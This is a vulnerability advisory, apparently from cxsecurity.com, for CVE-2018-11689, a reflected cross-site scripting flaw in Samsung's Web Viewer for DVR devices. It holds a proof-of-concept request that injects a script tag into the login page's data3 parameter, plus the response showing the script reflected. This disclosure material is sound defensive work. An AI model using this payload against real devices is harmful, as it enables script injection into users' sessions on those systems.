Samsung Web Viewer For Samsung DVR Cross Site Scripting

2018.06.14
Credit: Yavuz Atlas
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

I. VULNERABILITY ------------------------- Samsung Web Viewer for Samsung DVR Reflected Cross Site Scripting (XSS) II. CVE REFERENCE ------------------------- CVE-2018-11689 III. REFERENCES ------------------------- https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11689 IV. CREDIT ------------------------- Yavuz Atlas - Biznet Bilisim http://www.biznet.com.tr/biznet-guvenlik-duyurulari V. DESCRIPTION ------------------------- Samsung Web Viewer for Samsung DVR devices (Samsung Smart Viewer) is vulnerable to cross-site scripting. The vulnerability allows remote attackers to inject arbitrary web script or HTML. VI. PROOF OF CONCEPT ------------------------- Request: GET /cgi-bin/webviewer_login_page?lang=tu&loginvalue=0&port=0&data3=</script><script>alert(1)</script> HTTP/1.1 Host: 10.10.10.10 Response: HTTP/1.1 200 OK X-UA-Compatible: IE=EmulateIE9, requiresActiveX=true Content-type: text/html Connection: close Date: Wed, 23 May 2018 11:14:09 GMT Server: lighttpd/1.4.35 Content-Length: 10797 a| function setcookie(){ var val_rand = Math.random(); if(is_close_user_session == true) document.login_page_submit.close_user_session.value = 1; else document.login_page_submit.close_user_session.value = 0; document.login_page_submit.data1.value = data_parser(document.login_page.data1.value); document.login_page_submit.data2.value = do_encrypt(document.login_page.data2.value); document.login_page_submit.data3.value = </script><script>alert(1)</script>; document.login_page_submit.data4.value = val_rand; document.login_page_submit.submit(); } a|

References:

https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11689


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top